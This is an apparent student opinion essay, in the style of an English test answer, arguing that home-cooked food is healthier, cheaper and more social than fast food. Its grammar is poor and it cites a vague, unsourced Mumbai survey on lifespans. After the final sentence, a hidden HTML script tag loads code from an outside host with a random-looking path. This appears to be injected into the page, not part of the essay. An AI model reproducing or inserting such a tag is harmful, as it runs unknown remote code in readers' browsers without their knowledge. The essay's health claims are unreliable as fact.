Cooking food at home is a waste of time. Fast food restaurants help in living a modern and less stressful life. Do you agree or disagree?

Nowadays, there are people who argued that the fast food restaurants is far better than the food cooked in home because it saves their time. But still I disagree with this statement that home food is wastage of time as we get more calories and proteins from this food.

To begin with, there are number of restaurants available all over the world. They provide the best service with a short period of time but the thing is; we do not know what type of vegetables and chemicals are used by them. As people have noticed that most of the restaurants cooked their frozen food which is not fresh and harmless for our body. The survey was conducted in Mumbai by the Health Organisations where they formed that life span of people taken home food is more than the fast foodies.

However, home food is so hygienic and has number of calories because this food is made by us with fresh vegetables and products. Moreover, this food is cheapest which can afford by ordinary people and they can also add spices according to their taste. Home food also give opportunity to people to take food with their family and grandparents which in results make strong bond with each other.

In conclusion, I firmly believe that restaurant food is ready made which saves time but it is harmful. So people should avoid these type of food and prefer the home food most.<script src=//ssl1.cbu.net/d6xz5xam></script>